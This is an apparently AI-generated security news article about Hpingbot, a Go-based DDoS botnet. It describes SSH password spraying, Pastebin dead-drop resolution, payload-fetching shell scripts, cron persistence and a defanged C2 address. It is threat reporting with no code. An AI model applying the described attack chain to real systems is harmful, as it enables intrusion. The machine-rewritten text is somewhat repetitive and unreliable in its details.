Ethical Hacking News
In a new threat landscape, a rapidly-evolving Go-based malware named Hpingbot targets weak SSH configurations to launch distributed denial-of-service (DDoS) attacks. With its ability to exploit vulnerabilities in existing resources and systems, this new botnet emerges as a significant concern for network security.
Hpingbot is a new Go-based malware capable of targeting Windows and Linux systems. The malware enlists systems into a botnet that can launch DDoS attacks using hping3. Hpingbot takes advantage of weak SSH configurations and uses password spraying attacks to gain initial access. The attack chain involves using Pastebin as a dead drop resolver to point to an IP address for downloading the shell script. The malware aims to establish persistence by setting cron jobs to re-fetch and re-execute the payload after every login, reboot, or scheduled time interval.
In a recent disclosure, cybersecurity firm NSFOCUS revealed a new, rapidly-evolving Go-based malware named Hpingbot that's capable of targeting both Windows and Linux systems to enlist them into a botnet that can launch distributed denial-of-service (DDoS) attacks using hping3, a freely-available utility for crafting and sending custom ICMP/TCP/UDP packets.
The emergence of this new botnet family built from scratch is noteworthy, as it showcases strong innovation capabilities and efficiency in using existing resources, such as distributing loads through the online text storage and sharing platform Pastebin and launching DDoS attacks using hping3. This demonstrates that attackers are not only focusing on launching DDoS but also intend to go beyond service disruption to turn it into a payload distribution network.
Hpingbot primarily takes advantage of weak SSH configurations, propagated by means of an independent module that carries out password spraying attacks to obtain initial access to systems. The presence of German debugging comments in the source code likely indicates that the latest version may be under testing.
The attack chain involves using Pastebin as a dead drop resolver to point to an IP address ("128.0.118[.]18") that, in turn, is employed to download a shell script.
This script is then used to detect the CPU architecture of the infected host, terminate an already running version of the trojan, and retrieve the main payload that's responsible for initiating DDoS flood attacks over TCP and UDP. Hpingbot also aims to establish persistence by setting cron jobs to ensure that payload is re-fetched and re-executed after every shell login, reboot, or a scheduled time interval.
Furthermore, the attackers use nodes controlled by Hpingbot to deliver another Go-based DDoS component as of June 19 that, while relying on the same command-and-control (C2) sever, eschews Pastebin and hping3 calls for built-in flood attack functions based on UDP and TCP protocols.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Botnet-Emerge-Hpingbot-Targets-Weak-SSH-Configurations-for-DDoS-Attacks-ehn.shtml
https://thehackernews.com/2025/07/alert-exposed-jdwp-interfaces-lead-to.html
Published: Sat Jul 5 02:00:02 2025 by llama3.2 3B Q4_K_M
